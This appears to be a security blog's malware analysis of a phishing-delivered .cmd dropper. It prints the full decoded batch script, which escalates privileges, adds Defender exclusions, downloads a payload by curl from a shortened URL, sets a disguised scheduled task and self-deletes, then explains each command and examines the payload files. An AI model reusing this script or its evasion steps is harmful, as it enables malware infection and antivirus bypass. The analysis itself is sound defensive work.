A malicious email delivered a .cmd malware that escalates privileges, bypasses antivirus, downloads payloads, sets persistence, and self-deletes.I received this email from a friend to make an analysis. First, let me express my thanks to Janô Falkowski Burkard for this amazing contribution. A little context, He received an email that was really strange and with a URL that was even stranger stillThis URL hxxps://search[.]app/a3qBe downloaded a .cmd file.Opening this file to view its contents shows it’s impossible to understand how it works, as it appears to be encoded, but we can identify some PowerShell commands.Decoding malicious code to plain textI tried to use tools to deobfuscate the code inside the .cmd file, like:JSDeobfuscatorJSUnpackDeobfuscate.ioCyber ChiefInvoke-DOSfuscationBut I have more success when I put the code into Grok AI; only part of it works.Here is part of the malicious code decoded to plain text (Don’t run this on your Laptop or Desktop)@echo offsetlocal EnableDelayedExpansion:: 1. Check for administrator privileges and elevate if needednet session >nul 2>&1if %errorLevel% neq 0 ( powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs" exit /b):: 2. Define the installation folder (hidden by a leading space in the name)set "install_dir=%LOCALAPPDATA%\Microsoft\ lLctrJyDE"if not exist "!install_dir!" mkdir "!install_dir!" >nul 2>&1:: 3. Add the folder to Windows Defender exclusionspowershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue" >nul 2>&1:: 4. Download the payload (tries up to 3 times)set "url=https://is.gd/cjIjvU"set "jpg_file=!install_dir!\GWTcCSbX.jpg"set "zip_file=!install_dir!\GWTcCSbX.zip"set "attempt=0":downloadif !attempt! GEQ 3 goto :failureset /a attempt+=1"%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!" 2>nulif not exist "!jpg_file!" ( ping 127.0.0.1 -n 3 >nul goto :download):: Check if downloaded file is too small (likely failed)for %%Z in ("!jpg_file!") do if %%~zZ LSS 1024 ( del /f /q "!jpg_file!" >nul 2>&1 ping 127.0.0.1 -n 3 >nul goto :download):: 5. Rename .jpg to .zip and extract itren "!jpg_file!" GWTcCSbX.zip 2>nultar -xf "!zip_file!" -C "!install_dir!" 2>nuldel /f /q "!zip_file!" >nul 2>&1:: 6. Rename the extracted executableset "original_exe=!install_dir!\SteelSeriesEngine.exe"set "final_exe=!install_dir!\UserOOBEBrokervVW.exe"if not exist "!original_exe!" goto :failureren "!original_exe!" UserOOBEBrokervVW.exe:: 7. Add the final executable to Windows Defender exclusionspowershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!final_exe!' -ErrorAction SilentlyContinue" >nul 2>&1:: 8. Create a hidden scheduled task for persistence (runs on logon with 30s delay)set "xml_file=!install_dir!\t.xml"(echo ^echo ^echo ^echo ^echo ^true^echo ^PT30S^echo ^echo ^echo ^echo ^echo ^InteractiveToken^echo ^LeastPrivilege^echo ^echo ^echo ^echo ^IgnoreNew^echo ^false^echo ^false^echo ^false^echo ^PT0S^echo ^true^echo ^true^echo ^true^echo ^echo ^echo ^echo ^!final_exe!^echo ^echo ^echo ^) > "!xml_file!"schtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f >nul 2>&1del /f /q "!xml_file!" >nul 2>&1:: 9. Quick cleanup of any leftover download filesfor %%F in ("%USERPROFILE%\Downloads\document_*.zip") do del /f /q "%%F" >nul 2>&1:: 10. Reboot the computer in 60 seconds and self-deleteshutdown /r /t 60 /fstart /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""exit /b 0:failure:: Cleanup if anything failsif exist "!zip_file!" del /f /q "!zip_file!" >nul 2>&1if exist "!jpg_file!" del /f /q "!jpg_file!" >nul 2>&1if exist "!install_dir!" rd /s /q "!install_dir!" >nul 2>&1start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""exit /b 0This file .cmd ran a lot of commands, but I’ll focus only on this:powershell -NoP -C “Start-Process -FilePath ‘%~f0’ -Verb RunAs”powershell -NoP -W H -C “Add-MpPreference -ExclusionPath ‘!install_dir!’ -ErrorAction SilentlyContinue” >nul 2>&1set “url=https://is.gd/cjIjvU““%SYSTEMROOT%\System32\curl.exe” -s -L –connect-timeout 15 –max-time 120 -o “!jpg_file!” “!url!” 2>nultar -xf “!zip_file!” -C “!install_dir!” 2>nulpowershell -NoP -W H -C “Add-MpPreference -ExclusionPath ‘!final_exe!’ -ErrorAction SilentlyContinue” >nul 2>&1schtasks /create /tn “\Microsoft\Windows\IntelGraphicsTask” /xml “!xml_file!” /f >nul 2>&1shutdown /r /t 60 /fstart /b cmd /c “ping 127.0.0.1 -n 3 >nul & del /f /q “%~f0″”Now, let’s understand what each command does.powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs"Privilege escalation (run as administrator)Re-runs the same script (%~f0)Uses -Verb RunAs → requests administrator privilegesPurpose: gain full system accesspowershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue" >nul 2>&1Add antivirus exclusion (Windows Defender)Adds install_dir as an exclusion in Windows Defender-W H = hidden windowSilentlyContinue = ignore errorsNote: This allows files in that folder to run without being scannedset "url=https://is.gd/cjIjvU"Declare the URL variable passing the malicious website."%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!" 2>nulDownload a remote fileDownloads a file from the internetSaves it as .jpg (image file)Note: Likely disguised — it may not actually be an imagetar -xf "!zip_file!" -C "!install_dir!" 2>nulExtract an archiveExtracts a .zip file into the working directoryNote: This usually contains executable payloadspowershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!final_exe!' -ErrorAction SilentlyContinue" >nul 2>&1Add specific file exclusionAdds a specific .exe file to Defender exclusionsNote: Suggests this executable is the main payloadschtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f >nul 2>&1Persistence via a scheduled taskCreates a scheduled taskUses a legitimate-sounding name (“IntelGraphicsTask”)Loads configuration from an XML fileNote: Ensures the malware runs automaticallyshutdown /r /t 60 /fForce system rebootRestarts the computer in 60 seconds/f forces all apps to closeNote: Likely used to finalize installationstart /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""Self-deletionWaits a few seconds (ping used as delay)Deletes the script .cmd itselfNote: Removes evidenceNow let’s see how this works manually I’ll focus on website access. Here you can see when I try to open the URL hxxps://is[.]gd/cjIjvU, I’m redirected to another site. I’ll talk about it in the next steps.The original URL attempts to open a possible image (Fake), as shown above.When I check the unshortened URL (above), it’s the same as the one I received during my test. Normally, the attacker attempts to use a shortened URL to bypass tools and users. But initially, the shortened URL directs to hxxps://associatecountrynotifications[.]digital/document/ as shown in the image I included at the beginning of the article. (below)The file downloaded appears to be a .jpg or picture, but when we try to open it, we get a message saying it isn’t supported.Since I saw a tar command in the .cmd file, I renamed the file to this zip extension to see if it works, and guess what? Abra Cadabra, the magic happens. After this, I unzip the file, which creates a folder with the same name (see below).When I opened the folder, I found two files: a DLL and a Binary, as shown below.Now I’m using my favorite tool to start my analysis: PEStudio. An initial analysis of the DLL file yields some interesting insights. No Virustotal reputation, but the tool identified 78 red flags.When we look at the details, we can identify many functions in the imports tab.In the image below, you’ll see many functions duplicated; some malware creates this to confuse analysts or analysis tools.I made the same with the binary.During my investigation, I noticed something strange: the binary’s compile time was really old. For me, the attacker, Back to the Future (I love this movie), and compiled this file at a time when there was no software for game devices like mice and keyboards. This executable has been created to work alongside the DLL to exploit a vulnerability.Let’s see the malware running live RiproduciCreate this table for each step the malware executes on the virtual machine (Remember, don’t execute this on your Laptop/Desktop).The original report also includes Indicator of Compromise (IoCs).About the author: Zoziel Pinto FreireCyber Security Manager | Forensic Expert | Malware Analysis | Malware Developer | Threat Hunter | BlueTeam | Incident Responder | ResearcherFollow me on Twitter: @securityaffairs and Facebook and MastodonPierluigi Paganini(SecurityAffairs – hacking, malware)